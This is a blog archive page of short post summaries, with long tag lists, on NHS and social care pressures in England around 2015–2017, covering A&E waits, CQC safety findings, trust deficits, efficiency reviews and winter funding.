Posted in Acute Hospitals, BBC News, Charitable Bodies, Commissioning, Community Care, For Doctors (mostly), For Nurses and Therapists (mostly), For Researchers (mostly), For Social Workers (mostly), In the News, Integrated Care, King's Fund, Local Interest, National, NHS, Nuffield Trust, Quick Insights, RCN, Royal College of Psychiatrists, Standards, UK, Universal Interest | Tagged A&E Four-Hour Wait Standard, A&E Safe Staffing Levels, Accountable Care Organisations (ACOs), Adult Social Care Funding, Ageing Policy in the UK, Ageing Population, Alleged Humanitarian Crisis in NHS (Under-Funding for Social Care), Ambulance Diversions (Away From Over-Stretched Hospitals), Ambulance Diversions (“Diverts”), Available Beds, Bailouts and Rewards for Failure, Barker Commission, BBC News: Today (Radio 4), BBC Newsnight, BBC Politics News, BBC Radio 4 Today, BBC Radio 4's Today Programme, BBC Radio 4: Today Programme, BBC Regional News: Hereford and Worcester, Bed Availability and Occupancy, Black Alerts, BMJ Publishing Group Ltd, Brexit, British Medical Journal (BMJ), British Red Cross, Cancelled Cancer Operations, Cancelled Elective Operations, Cancelled Non-Elective Operations, Cancelled Operations, Cancer Waiting Times, Cancer: Waiting Times for Testing and Treatment, Capped Expenditure Process, Commission on the Future of Health and Social Care in England (Barker Commission), County Durham and Darlington NHS Foundation Trust, Cross-Party and Public Consensus On Sustainable Funding, Demand and Capacity, Demand for Social Care, Demand Versus Capacity Gaps, Department of Health Revenue Underspend (2016/17), Dr Mark Holland, Dr Mark Holland: President of Society For Acute Medicine (SAM), Dr Taj Hassan: President of Royal College of Emergency Medicine, East London NHS Foundation Trust, East Midlands Ambulance Service, Efficiencies and Productivity Gains, Financial Flows in NHS and Social Care, Four-Hour A&E Waiting Time Target, Frimley Park NHS Foundation Trust, Funding Deficits, Health and Social Care in the Community, Health Demand, Healthwatch Worcestershire, Hip and Knee Operations: Rationing, Humanitarian Crisis in NHS Hospitals and Ambulance Services (Allegation), Ian Eardley: Vice President of RCS, Inadequate Staffing, Jacqueline McKenna: Director of Nursing and Professional Leadership at NHS Improvement, Jeremy Corbyn (Labour Party Leader), Katherine Murphy: Chief Executive of the Patients Association, King’s Fund Barker Commission, Leadership Development, Long Waiting Times, Lord Carter Review, Lord Rose Report on Leadership in the NHS, Lord Rose Report: Better Leadership for Tomorrow, Low Morale, Mike Adamson: Chief Executive of British Red Cross, Mixed-Sex Accommodation (MSA) Breaches, Mixed-Sex Hospital Accommodation, New Care Models, New Models of Care, New Models of Service, NHS England’s Five Year Forward View, NHS England’s New Models of Care Programme, NHS Five Year Forward View (5YFV), NHS in 2017: Service Under Pressure, NHS Rationing, NHS Redditch and Bromsgrove CCG, NHS Safe Staffing, NHS South Worcestershire CCG, NHS Sustainability, NHS Trust Financial Deficits, NHS Waiting Times, NHS Wyre Forest CCG, Non-Emergency Waiting Times, Northumbria Healthcare NHS Trust, Nurse Staffing Levels, OPEL Level 3 Alerts, OPEL Level 4 Alerts, Operational Pressures Escalation Levels, Operational Pressures Escalation Levels (OPELs), Operational Pressures Escalation Levels Framework (NHS England), Operational Productivity and Performance (Carter Report), Patient Safety, Patients Seen in 4 Hours: NHS Local Performance Tracking Service (NHS Winter Project), Patients Waiting More Than Four Hours For Hospital Beds (Trolley Waits), Pennine Acute Hospitals NHS Trust, Peter Pinfield: Chairman of Healthwatch Worcestershire, Population Health, Priorities for Health and Social Care (King’s Fund), Priorities For NHS and Social Care in 2017, Productivity Improvements, Productivity in the NHS, Professor Keith Willett: NHS England’s Director of Acute Care, Public Dissatisfaction With Austerity, Red Cross, Referral to Treatment Waiting Times, Restrictions on Non-Emergency Surgery, Reverse-Acting Hawthorne Effect (Speculative Construct), Royal College of Emergency Medicine (RCEM), Royal College of Nursing (RCN), Royal College of Physicians (RCP), Royal College of Surgeons (RCS), Sick Man of Europe (Redefined), Simon Stevens: Chief Executive of NHS England, Society for Acute Medicine (SAM), South Tyneside NHS Foundation Trust, Staffing Levels, Sustainability, Sustainability and Transformation Plans (STPs), Sustainable Funding, The #OurNHS March (2017), Thinking Like a Patient and Acting Like a Taxpayer, Unhealthy Lifestyles, Unspoken Political Context: Weaponising the NHS (Speculative Construct), Urgent and Emergency Services: 2016-7 Winter From Hell (Allegation), Vacant NHS Posts, Waiting Times, Waiting Times for Planned Treatments, Western Sussex NHS Foundation Trust, Winter From Hell: 2016-7 (Allegation), Winter Pressures, Worcestershire Acute Hospitals NHS Trust, Worcestershire Royal Hospital | Leave a comment
More on Patient Safety Concerns (BBC News / CQC)
Summary A Care Quality Commission (CQC) review reports that three-quarters of hospitals visited under its new inspection regime so far have shown some safety problems. Safety remains an issue across both the NHS and care sectors in England, there being … Continue reading →
Posted in Acute Hospitals, BBC News, Commissioning, Community Care, CQC: Care Quality Commission, For Carers (mostly), For Doctors (mostly), For Nurses and Therapists (mostly), For Researchers (mostly), For Social Workers (mostly), In the News, Integrated Care, Local Interest, Mental Health, National, NHS, Person-Centred Care, Quick Insights, Standards, Statistics, UK, Universal Interest | Tagged Acute Care, Acute Hospitals, Adult Social Care, Adult Social Care in England, Adult Social Care Ratings by Service Type, Adult Social Care Services, Adult Social Care: Market Oversight, Agency for Healthcare Research and Quality, Agency for Healthcare Research and Quality (AHRQ) Patient Safety Glossary, AHRQ, AHRQ Patient Safety Net, Barking, Barts Health NHS Trust, Basildon and Thurrock University Hospitals NHS Foundation Trust, BBC Health News, Buckinghamshire Healthcare NHS Trust, Burton Hospitals NHS Foundation Trust, Care Home Environments, Care Home Inspections, Care Home Sector, Care Homes, Care Homes Wellbeing, Care Homes. Nursing Homes, Care Quality Commission, Care Quality Commission (CQC), Care Quality Commission Inspection Ratings, Care Quality Commission New Inspection Ratings System, Care Requiring Improvement, Care Staffing: Capacity and Capability, Caring, Colchester Hospital University NHS Foundation Trust, Commissioning for Outcomes, Commissioning for Quality, Community Social Care, Competent and Capable Staff, Continuous Learning and Improvement, Continuous Learning Culture, CQC Hospital Inspections, CQC Inspection Questions (Safe Effective Caring Responsive Well-Led), CQC Inspections of GP Surgeries, CQC Recognition of Well-Led Organisations, Cross-Organisation Learning, Dementia Care, Domiciliary Care Agencies, East Kent Hospitals University NHS Foundation Trust, East Lancashire Hospitals NHS Trust, Encouraging Improvement, Equality, Frimley Park Hospital NHS Foundation Trust, George Eliot Hospital NHS Trust, Good Care, GP Inspections, GP Practices, GP Surgeries, Havering and Redbridge University Hospitals NHS Trust, Health and Adult Social Care, Health and Care, Health and Social Care, Heatherwood and Wexham Park Hospitals NHS Foundation Trust, High Quality Care, Hinchingbrooke Health Care NHS Trust, Home Care Services, Home Care Standards, Hospital Inspections, Improving Patient Safety, Inadequate Care, Inclusion Healthcare Social Enterprise in Leicester, Innovation, Inspections, Inspections by CQC, Leadership, Learning Culture, Learning From Mistakes, Local Variations, Medway NHS Foundation Trust, Mental Health Services, Multi-Disciplinary Team (MDT), Multi-Disciplinary Working, Multidisciplinary Teamwork, New Ratings System (CQC), NHS Safe Staffing, Norfolk and Suffolk NHS Foundation Trust, North Cumbria University Hospitals NHS Trust, North Lincolnshire and Goole NHS Foundation Trust, Nursing and Residential Homes, Nursing Homes, Open and Transparent Culture, Outstanding Care, Patient Safety, Patient Safety Glossary, Patient Safety Improvement, Patient Safety in the NHS, Patient Safety Indicators, Patient Safety Net (PSNet), Patient Safety Net (PSNet)'s Patient Safety Glossary, Peterborough and Stamford Hospitals NHS Foundation Trust, Primary Medical Services, Private Healthcare Information Network, Quality Improvement, Ratings, Ratings Grid For Acute Hospitals, Re-Inspections Drive Improvement, Reporting Culture, Reporting Culture in the NHS, Residential Homes, Resilience, Responsive, Safe (CQC Inspection Question), Safe Staffing, Safety, Safety and Effectiveness, Salford Royal NHS Foundation Trust, Sherwood Forest Hospitals NHS Foundation Trust, Skills, Social Care, Staffing, State of Care Report, State of Health Care and Adult Social Care in England 2014/15, Tameside Hospital NHS Foundation Trust, Temporary Staff, The Queen Elizabeth Hospital King’s Lynn NHS Foundation Trust, Transparency, Transparency and Accountability, Trusts in Special Measures, Unacceptable Variations, Unannounced Hospital Inspections, United Lincolnshire Hospitals NHS Trust, University Hospitals of Morecambe Bay NHS Foundation Trust, Unwarranted Variations, Variations in Care, Variations in Quality of Care, Well-Led, Well-Led (CQC Inspection Question), Well-Led Indicators (CQC), Wye Valley NHS Trust | Leave a comment
Escalating NHS Trust Deficits: Not Unexpected (BBC News / Monitor)
Summary NHS Trusts in England have run-up a £930 million “worst for a generation” deficit in the first three months of this financial year. Regulators have also noted that performance measures on waiting times for access to hospital treatment and … Continue reading →
Posted in Acute Hospitals, BBC News, Commissioning, Department of Health, For Doctors (mostly), For Nurses and Therapists (mostly), For Researchers (mostly), Health Foundation, In the News, National, National Audit Office, NHS, Quick Insights, Standards, Statistics, UK, Universal Interest | Tagged Achieving Better Value, Acute Care, Acute Hospital Care, Ageing Population, Ageing Society, Agency Overheads, Agency Staff, Agency Staff (Exorbitant Waste of NHS Funding), Agency Staff Spending Capped, Ambulance Response Times, Ambulance Response Times: NHS Performance Indicators, Bailouts and Rewards for Failure, Bank And Agency Staff, BBC Health News, Better Value in the NHS, Cancer Waiting Times, Chorley and South Ribble Hospital, Comparisons of NHS Spending With Health Spending Internationally (King's Fund 2016), Contract and Agency Staff, Cost-Effectiveness, Daily Mail, Diagnostic Waiting Times, EBITDA, EBITDA: Earnings Before Interest Tax Depreciation and Amortisation, Elective Waiting Times, EU Referendum Debate: BBC News Reality Check, European Union Referendum, European Union Referendum Debate: BBC Reality Check, Faustian Pact: Trading £8 Billion in Extra Funding For £22 Billion in Efficiency Savings, Financial Constraints, Financial Context, Financial Difficulties, Financial Performance, Financial Planning, Financial Position of NHS Trusts, Financial Pressure in the NHS, Financial Pressure on Hospitals, Financial Pressures, Financial Resilience, Financial Sustainability in the NHS, Funding Challenges, Funding Deficits, General Hospitals, Incentives Rewards and Sanctions, Key Performance Indicators, Management Consultants, Monitor, National Audit Office (NAO), NHS Expenditure, NHS Financial Leadership, NHS Foundation Trust Performance, NHS Foundation Trusts, NHS Foundation Trusts (NHSFTs), NHS Funding, NHS Funding Gap, NHS Performance, NHS Performance Indicators, NHS Productivity, NHS Safe Staffing, NHS Spending, NHS Timebomb [sic], NHS Trust Development Authority, NHS Trust Development Authority (NHS TDA), NHS Trust Financial Deficits, NHS Trusts’ and Foundation Trusts’ Income and Expenditure, NHS Waiting Times, Operational Performance, Operational Performance: Accident and Emergency, Operational Performance: Infection Control, Operational Performance: Mental Health, Performance Indicators, Performance Targets, Policy, Policy Context, Preparations for Winter, Productivity, Productivity in the NHS, RDEL, Reducing Drains on the NHS, Reducing Waste in the NHS, Reward Systems, Rewarding Failure, Rising Expectations, Safe Staffing, Seven-Day NHS Services, Seven-Day Opening, Seven-Day Services in Hospital, Staffing (Hospitals), Stevens Challenge, Taxpayers’ Alliance, Thinking Like a Patient and Acting Like a Taxpayer, Upward Spending Pressures, Waiting Time Standards, Waiting Time Target Breaches, Waiting Time Targets in the NHS in England, Waiting Times for Planned Treatments, Winter Pressures | Leave a comment
Rising Deficits and the Search for Better Value in the NHS: New Approaches to Financial Sustainability? (King’s Fund / BBC News / Health Foundation / BMJ)
Summary Regulators have demanded that hospitals and NHS trusts in England review their financial plans, because rising deficits indicate that existing plans are increasingly unaffordable. Full Text Link Reference Health regulator tells NHS trusts to ‘look again’ at finances. London: … Continue reading →
Posted in Acute Hospitals, Charitable Bodies, Commissioning, Community Care, For Carers (mostly), For Doctors (mostly), For Nurses and Therapists (mostly), For Researchers (mostly), For Social Workers (mostly), Health Foundation, In the News, Integrated Care, International, King's Fund, Mental Health, National, NHS, Non-Pharmacological Treatments, Pharmacological Treatments, Quick Insights, Standards, Statistics, UK, Universal Interest | Tagged Achieving Better Value, Acute Care, Acute Hospital Care, Ageing Population, Ageing Society, Alder Hey Children’s Hospital, Alignment of Financial Incentives, Atlas of Health Care, Avoiding Avoidable Care, Benchmarking, Better Value, Better Value Healthcare, Better Value in the NHS, Bond University, Bond University (Robina: Australia), Canada’s CAD800m Primary Health Care Transition (PHCT) Fund, Canada’s Primary Health Care Transition Fund, Care of Frail Older People With Complex Needs, Center For Medical Consumers: Why Too Much Medicine Is Making Us Sicker And Poorer, Centre for Research in Evidence-Based Practice: Bond University, Chartered Institute of Public Finance and Accountancy, Choosing Wisely, Choosing Wisely Campaign, Choosing Wisely in the NHS, CIPFA, Clinical Responsibility for Patients (Choosing Wisely and New Deal), CNWL: NHS Camden Provider Services, Cost-Effectiveness, Cost-Effectiveness in Health Care, Creative Use of NHS Estate, Crisis Response Falls Team (CRFT), Dartmouth Atlas of Health Care (US), Dartmouth Institute for Health and Clinical Practice, Deinstitutionalisation of UK Mental Health Services, Denmark’s Quality Fund, Discharge to Assess Programme, Drivers of Improvement, Dysfunctional Patient Flow, East Midlands Ambulance Service NHS Trust, Efficiency Savings, Estimated Cost Savings From Implementing NICE Guidelines, Faustian Pact: Trading £8 Billion in Extra Funding For £22 Billion in Efficiency Savings, Financial Constraints, Financial Context, Financial Difficulties, Financial Performance, Financial Planning, Financial Position of NHS Trusts, Financial Pressure in the NHS, Financial Pressure on Hospitals, Financial Pressures, Financial Resilience, Financial Sustainability in the NHS, Frail Older People, Frail Older People With Complex Needs, Funding Challenges, Funding Deficits, General Hospitals, Geographical Variations, Girls’ Education Challenge (GEC) Fund, Health of Health Finances CIPFA Briefing, Heart of England NHS Foundation Trust, Higher Quality Care at Lower Cost: Examples from NICE Local Practice Collection, Hospital Productivity, Improving Patient Flow, Improving Prescribing Practice, Inappropriate Care, Inappropriate Prescribing, Integrated Care and Support, Integration of Health and Social Care, Integration of Health and Social Care for Older People, Key Performance Indicators, Length of Stay (LoS), Local Variations, London Challenge, Long-Term Care (LTC), Long-Term Conditions (LTCs), Low-Value Care, Low-Value Elective Procedures, Management of Repeat Prescriptions in Walsall, Medical Overuse, Medication Errors and Adverse Drug Reactions, Misuse: Resulting in Preventable Complications or Harm, Models of Care Across Organisational Boundaries, Monitor, Multimorbidities, Multimorbidities and Long-Term Conditions, National Service Framework for Mental Health in England (NSF-MH), NHS Benchmarking, NHS Challenges and New Solutions, NHS Efficiency Savings, NHS England Funding, NHS Expenditure, NHS Financial Leadership, NHS Five Year Forward View (5YFV), NHS Foundation Trust Performance, NHS Foundation Trusts, NHS Foundation Trusts (NHSFTs), NHS Funding, NHS Funding Gap, NHS Inappropriate Care: Overuse Underuse and Misuse, NHS Performance, NHS Performance Indicators, NHS Productivity, NHS Safe Staffing, NHS Spending, NHS Timebomb [sic], NHS Trust Development Authority, NHS Trust Development Authority (NHS TDA), NHS Trust Financial Deficits, NHS Trusts’ and Foundation Trusts’ Income and Expenditure, NHS Walsall CCG, NHSFT Sector, NICE Local Practice Collection: Examples of Higher Quality Care at Lower Cost, Nicholson Challenge, Non-Foundation Trusts (Finances), Nurse Staffing Levels, Operating Expenses, Outcomes and Monitoring, Overkill: Unnecessary Medical Care, Overprescribing, Overuse, Overuse of Diagnostic or Monitoring Tests / Procedures, Overuse of Medication, Overuse Underuse and Misuse, Oxford University Hospitals, Patient flow, Patient Flow for Older People (in Sheffield), Patient Flows, Patient Safety Incidents in England, Performance Indicators, Performance Targets, Plymouth Hospitals NHS Trust, Policy, Policy Context, Preventable Harm, Preventing Falls in the NHS, Preventing Overdiagnosis Conference, Productivity, Productivity in the NHS, RDEL, Redesigning Care Pathways, Redesigning Services, Reducing Drains on the NHS, Reducing Overuse Underuse and Misuse, Reducing Prescribing Costs, Reducing Waste in the NHS, Releasing Value From Surplus Estate, Repeat Prescriptions, Rising Expectations, Safe Staffing, Selling Sickness, Sheffield Patient Flow, Sheffield Teaching Hospitals NHS Foundation Trust, Smith Review, Stevens Challenge, Stroke REACH Early Discharge Scheme (REDS), Stroke Services at Plymouth Hospitals NHS Trust, Targeting Low-Value Care, Transformation Fund, Transformation Fund for the NHS, Troubled NHS Foundation Trusts, Unacceptable Variations, Underuse, Underuse of Effective Interventions, Unwarranted Variations, Variation in Commissioning, Variations in Care, Variations in Procurement, Variations in Spending, Whole System Patient Flows | Leave a comment
BBC Health and Care Pre-Election Policy Navigator (BBC News)
Summary BBC News has produced a Policy Guide mapping tool, summarising the positions of the respective main political parties on various health and care related themes, both nationally and regionally. “This issue includes NHS funding, GP access and social care, … Continue reading →
Posted in Acute Hospitals, BBC News, Carers UK, Charitable Bodies, Commissioning, Community Care, For Carers (mostly), For Doctors (mostly), For Nurses and Therapists (mostly), For Social Workers (mostly), Health Education England (HEE), In the News, Integrated Care, King's Fund, Local Interest, Management of Condition, Mental Health, National, NHS, Northern Ireland, Patient Information, Person-Centred Care, Quick Insights, Scotland, Standards, UK, Universal Interest, Wales | Tagged 24/7 Access to Urgent and Emergency Care, 24/7 Care, 24/7 Consultant Cover, 24/7 Diagnostic Services, 24/7 Service, 5YFV: NHS Five Year Forward View, Adult Social Care, Ageing and Society, Ageing Policy in the UK, Ageing Population, Agency Staff, Agency Staff (Exorbitant Waste of NHS Funding), Alliance Party, An Independence Party (Non-BBC Content: External Internet Site), Bank And Agency Staff, BBC Health and Care Pre-Election Policy Navigator, BBC Health News, Britain First Party (Non-BBC Content: External Internet Site), British National Party (Non-BBC Content: External Internet Site), Cancer Waiting Times, Carers UK’s Carers Manifesto, Carers' Manifesto, Christian Party (Non-BBC Content: External Internet Site), Christian Peoples Alliance (Non-BBC Content: External Internet Site), Cista (Non-BBC Content: External Internet Site), Communities United Party (Non-BBC Content: External Internet Site), Community Nursing Workforce, Conservative Party, Creeping Privatisation in NHS (sic), DUP, Education and Training Commissions for 2015/16 (HEE), Election 2015, Election 2015: Reality Checks (BBC News), English Democrats (Non-BBC Content: External Internet Site), Five Year Forward View, Five Year Forward View (NHS England), Former Health Secretary Jeremy Hunt, Future Workforce, General Infection (Surrealist Humour), General Practice Workforce, GP Access, GP Out-of-Hours Services, GP Workforce, Green, Health Education England's (HEE) Workforce Plan for England 2015-16, HEE Workforce Plan for England: Proposed Education and Training Commissions (2015/16), Hospital Waiting Times, Jury Team (Non-BBC Content: External Internet Site), Labour Party, Left Unity (Non-BBC Content: External Internet Site), Lib Dems, Long Waiting Times, Mebyon Kernow (Non-BBC Content: External Internet Site), Mental Health Waiting Times, Mental Health Workforce, National Health Action Party, National Health Action Party (Non-BBC Content: External Internet Site), NHS England’s Five Year Forward View, NHS Five Year Forward View (5YFV), NHS Funding, NHS Privatisation Debate (sic), NHS Safe Staffing, NHS Waiting Times, NHS Workforce, NHS Workforce Census, NHS Workforce: Community Nursing, NHS Workforce: General Practice, NHS Workforce: Mental Health, Nicholson Challenge, No2EU (Non-BBC Content: External Internet Site), Nurse Staffing Levels, Older Carers, Plaid Cymru, Pre-Election Policy Navigator, Privatisation (Backdoor), Privatisation (Debate), Progressive Unionist Party (Non-BBC Content: External Internet Site), Repeal of Health and Social Care Act 2012, Respect, Rt Hon Jeremy Hunt MP: Former Secretary of State for Health, Scottish Socialist Party (Non-BBC Content: External Internet Site), SDLP, Seven-Day GP Access, Seven-Day NHS Services, Seven-Day Opening, Seven-Day Services in Hospital, Seven-Day Services in the Community, Seven-Day Working, Sinn Fein, Sir David Nicholson, SNP, Social Care, Socialist Labour Party (Non-BBC Content: External Internet Site), Socialist Party of Great Britain (Non-BBC Content: External Internet Site), Solidarity (Non-BBC Content: External Internet Site), Staffing Levels, The Doctor Can't See You Now (Labour Election Campaign Poster), Trade Unionist and Socialist Coalition (Non-BBC Content: External Internet Site), UKIP, Unmet Needs of Family Carers, Unpaid Carers, Weaponising the NHS (Labour: Attributed Phrase), Workforce Development, Workforce Planning, Workforce Planning (NHS), Yorkshire Devolution Movement (Non-BBC Content: External Internet Site), Yorkshire First (Non-BBC Content: External Internet Site) | Leave a comment
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Tag Archives: Winter Pressures Beyond Winter (Winter Re-Defined?)
Financial Sustainability in the NHS: Holding Up a Mirror? Reflection (BBC News / NHS Improvement / NHS England / BMJ / OECD / BJS)
Summary The authors of the Getting It Right First Time (GIRFT) report believe that the NHS may not actually need further money from the taxpayer, asserting that efficiency savings identified (in the field of general surgery alone, and without looking … Continue reading →
Posted in Acute Hospitals, BBC News, Commissioning, Community Care, For Doctors (mostly), For Nurses and Therapists (mostly), For Researchers (mostly), In the News, International, Mental Health, National, NHS, NHS England, NHS Improvement, Quick Insights, Standards, Statistics, UK, Universal Interest, World Health Organization (WHO) | Tagged American College of Surgeons National Surgical Quality Improvement Program (ACS NSQIP), Anatomy of the Model Hospital, £22 Billion Efficiency Savings by 2020-21, BBC Health News, Bedford Musculoskeletal Disorders (MSK) Referral Management Centre, Bedford Referral Management Centre (RMC), Better Together Vanguard, Birmingham and Solihull United Maternity and Newborn Pathway (BUMP) Early Adopter, BMJ Publishing Group Ltd, British Journal of Surgery, British Medical Journal (BMJ), BUMP: Birmingham and Solihull United Maternity and Newborn Pathway, Chris Hopson: Chief Executive of NHS Providers, Closing the Finance and Efficiency Gap, Closing the Funding and Efficiency Gap, Consumer Experiences of Health and Social Care, Continuous Learning Culture, Cumbria CCG’s Pain Management Service, Delayed Transfers of Care (DTOC), Diabetes and Obesity, Durham and Darlington Children’s and Young Person’s Mental Health Services Crisis and Liaison team (CYPMHS), Duty of Best Value, East and North Hertfordshire CCG Vanguard, Economic Sustainability, Efficiency and Effectiveness, Efficiency Frontiers, Efficiency Opportunities, Efficiency Savings, End-User Experience, Enhanced Health in Care Homes, Estates and Technology Transformation Fund, Exemplar Clinical Pathways, Failing Services (NHS and Social Care), Financial Constraints, Financial Context, Financial Difficulties, Financial Issues, Financial Management, Financial Performance, Financial Planning, Financial Pressure in the NHS, Financial Pressures, Financial Resilience, Financial Sustainability in the NHS, Financial Sustainability of NHS Bodies, Financing of Health Care, Future Financial Sustainability, Future of NHS and Social Care, Fylde Coast Local Health Economy, General Surgery: GIRFT Programme National Specialty Report (August 2017), Geographical Variations, Getting it Right First Time, Getting It Right First Time (GIRFT), GIRFT and Other Improvement Initiatives, GIRFT Programme, GIRFT Programme National Specialty Report (August 2017), Global Health and Development Group: Imperial College London, Governance-Related Waste: Abuse, Governance-Related Waste: Administration Costs, Governance-Related Waste: Corruption, Governance-Related Waste: Fraud, Governance-Related Waste: Integrity Violations, Governance-Related Waste: Managerial Self-Interest, Governance-Related Waste: Managerial Spin and Self-Deception, Governance-Related Waste: Self-Regulation vs. Integrity Violations, Health and Social Care, Health and Social Care Costs, Health and Social Care Integration, Health and Social Care Services, Healthcare Quality Improvement Partnership (HQIP), Healthy New Towns, Imperial College London, Improvement Initiatives, Inappropriate Use of Antimicrobials, Institute of Global Health Innovation: Imperial College London, Integrated Personal Commissioning (IPC), Integrated Personal Commissioning (IPC) Programme, John Abercrombie: GIRFT Clinical Lead for General Surgery, Learning Culture, Learning from Data, Learning From Peers, Length of Stay (LoS), Local Health Services: Variations, Local Variations, Low-Value General Surgical Procedures, Mental Health and Dementia, Model Hospital: Template for Standardisation, National Innovation Accelerator, NHS and Social Care Spending, NHS Efficiency Challenge, NHS Efficiency Savings, NHS England (Formerly the NHS Commissioning Board), NHS England Annual Report and Accounts (2016/17), NHS Funding, NHS Funding Gap, NHS North Kirklees CCG, NHS Providers, NHS Stockport CCG, NHS Sustainability, NHS Waltham Forest CCG, NHSI: NHS Improvement, North East London Choice and Personalisation Pioneer, Operational Productivity and Performance (Carter Report), Operational Waste: Hospital Care, Operational Waste: Pharmaceuticals, Organisation for Economic Cooperation and Development (OECD), Overdiagnosis and Overtreatment, Overtreatment (Speculative Concept), Patient Experiences, Patients Waiting More Than Four Hours For Hospital Beds (Trolley Waits), Paul Baumann: Chief Financial Officer at NHS England, Personalised Medicine, Potential NHS Provider Productivity improvements, PPIB: Purchasing Price Index Benchmark and Benchmark Tool, PricewaterhouseCoopers LLP, Productivity, Professor Sir Malcolm Grant, Professor Tim Briggs: GIRFT Programme Chair, Professor Tim Briggs: National Director for Clinical Quality and Efficiency at NHS Improvement, Public Opinion, pwc, Quality and Sustainability, Reducing Delayed Transfers of Care, Reducing Waste in the NHS, Renal e-clinics in Tower Hamlets, Right First Time, Road to Recovery: Delivering Financial Sustainability in NHS (PwC), Royal College of Surgeons (RCS), Royal College of Surgeons of England (RCSENG), Royal National Orthopaedic Hospital, Royal National Orthopaedic Hospital NHS Trust, Science and Innovation, Simon Stevens: Chief Executive of NHS England, Sir Malcolm Grant: Chair of NHS England, Sustainability, Sustainable Care, Sustainable Funding, Sustainable Health and Care Services, Tackling Barriers to Innovation, Tackling Variation, Thinking Like a Patient and Acting Like a Taxpayer, Tower Hamlets Together, Transformational Commissioning, Transformational Technologies, Transparency, Unacceptable Variations, Unwarranted Variations, Upward Spending Pressures, Urgent Response Assess at Home Pathway, Variation in General Surgery, Variations in Care, Variations in Procurement, Variations in Quality of Care, Variations in Spending, Wasted Resources, Wasteful Clinical Care, Winter Pressures Beyond Winter (Winter Re-Defined?), World Health Organisation (WHO) | Leave a comment
A Tipping Point in the Sustainability of Health and Care? (BBC News / King’s Fund / Nuffield Trust)
Posted on September 19, 2016 by Dementia and Elderly Care News
Summary A King’s Fund / Nuffield Trust report identifies a 26% decline in the number of older people receiving social care, due largely to six years of cuts to local authority funding. Social care providers are found to be under pressure … Continue reading →
Posted in Age UK, BBC News, Charitable Bodies, Commissioning, Community Care, For Carers (mostly), For Nurses and Therapists (mostly), For Researchers (mostly), For Social Workers (mostly), In the News, Integrated Care, King's Fund, Management of Condition, National, NHS, Non-Pharmacological Treatments, Nuffield Trust, Person-Centred Care, Personalisation, Quick Insights, Standards, Statistics, UK, Universal Interest | Tagged Adult Social Care, Adult Social Care Funding, Adult Social Care in England, Adult Social Care Services, Ageing Population, Association of Directors of Adult Social Services (ADASS), BBC Health News, Bed Availability and Occupancy: NHS Performance Indicators, Bed-Blockers, Bed-Blocking Patients (Non-Recommended Term), Better Care Fund (BCF), Better Care Fund Plans, Care for Vulnerable Older People, Caroline Abrahams: Director of Age UK, Coordinated Health and Social Care, Costs and Cost Pressures, Cross-Sector Partnerships, Delayed Discharges, Delayed Transfers of Care, Delayed Transfers of Care (DETOCs), Delayed Transfers of Care (DTOC), Delayed Transfers of Care: NHS Performance Indicators, Discharge, Discharge Programme Board, Efficiency Opportunities, Eldercare Vouchers, Elderly Failed By Shameful Care System (Allegation From Age UK and Alzheimer’s Society), Elderly People With Complex Health and Social Care Needs, Endless Winter in NHS (Allegation), Eternal Winter, Financial Constraints, Financial Context, Financial Difficulties, Financial Performance, Fragility of Adult Social Care Provider Market, Health and Social Care, Health and Social Care Configuration, Health and Social Care in the Community, Health and Social Care Integration, Health and Social Care Providers, Health and Social Care Services, Home Truths: Social Care For Older People (2016), Integration of Health and Social Care, Integration of Health and Social Care for Older People, Interdependencies, Lady Ros Altmann, Length of Stay (LoS), Lost Beds Problem (sic), Making Our Care and Health Systems Fit for An Ageing Population, NHS Funding, NHS Funding Gap, NHS Overspends, NHS Performance, NHS Performance Indicators, NHS Productivity, Patient Flows, Population Winter Pressures, Quarterly Monitoring Report, Quarterly Monitoring Reports, Richmond Group of Charities, Social Care For Older People: Home Truths, Society of Acute Medicine: Meltdown Warning, Submissions Ahead of Chancellor Philip Hammond's Autumn Statement (2016), Sustainability, Sustainable Care, Sustainable Funding, Sustainable Health and Care Services, Sustainable Local Funding, Tax Breaks on Saving For Care, Thinking Like a Patient and Acting Like a Taxpayer, Transition Between Inpatient Hospital Settings and Community or Care Home Settings, UK Home Care Association, UK Homecare Association (UKHCA), Unacceptable Variations, Unwarranted Variations, Upward Spending Pressures, Variation in Performance, Variations in Quality of Care, Variations in Service, Variations in Spending, Vulnerable Older People, Waiting Time Standards, Waiting Time Target Breaches, Wasted Resources, Whole System Patient Flows, Winter Pressures, Winter Pressures Beyond Winter (Winter Re-Defined?), Winter Pressures: Role of Community Health Services | Leave a comment
Allocations of Extra Funding to Ease “Winter Pressures” on NHS Services (BBC News / NHS England)
Summary The ongoing “crisis” in A&E admissions / winter pressures has caused a number of hospitals across the country to declare “major incidents” (although some of these incidents were short-lived and have since been lifted). The list of the hospitals … Continue reading →
Posted in Acute Hospitals, BBC News, Commissioning, Community Care, Department of Health, For Doctors (mostly), For Nurses and Therapists (mostly), For Researchers (mostly), For Social Workers (mostly), In the News, Integrated Care, Local Interest, Management of Condition, National, NHS, NHS England, NICE Guidelines, Northern Ireland, Person-Centred Care, Quick Insights, Scotland, Standards, UK, Universal Interest, Wales | Tagged 5YFV: NHS Five Year Forward View, 7 Day Pharmacy Services, 7 Day Pharmacy Services in Sunderland and in Northumberland, A&E Four-Hour Wait Standard, A&E Safe Staffing Levels, Accident & Emergency, Accident and Emergency Departments, Acute Care, Acute Hospital Care, Addenbrookes and the Rosie Hospitals, Addenbrookes Hospital, Ageing and Society, Ageing Population, Ambulance Delays at Emergency Departments, Ambulance Services, Ambulance Waits at Emergency Departments, Ashford and St Peter's Hospitals NHS Foundation Trust, Attendances at A&E: NHS Local Performance Tracking Service (NHS Winter Project), Avoidable Admissions, Avoidable Rehospitalisations, Bath and Cheltenham General Hospital, BBC Midlands, Bristol, Care in Appropriate Settings, Care Integration, Clinical Commissioning Groups (CCGs), Commons Health Select Committee, County Hospital (Previously Stafford Hospital), Croydon University Hospital, Delayed Discharges, Discharge to Assess Programme, Dorset, Dr Clifford Mann: President of the College of Emergency Medicine, Emergency Admissions, Emergency Admissions: NHS Local Performance Tracking Service (NHS Winter Project), Emergency Ambulance Services, Emergency and Urgent Care Services, Emergency Bed Use, Emergency Care, Emergency Departments, Emergency Services, Factors Behind Increasing Emergency Admissions, Feeling Under the Weather (Campaign), Five Year Forward View (NHS England), Flu Vaccination Programmes for NHS Staff, Flu Vaccination Programmes for Vulnerable Members of Public, Frail elderly patients Moved Into Nursing Homes Paid for by NHS For Up To 6 Weeks, Gloucestershire Royal Hospital, Gridlock (Under-Capacity) in A&E Departments / 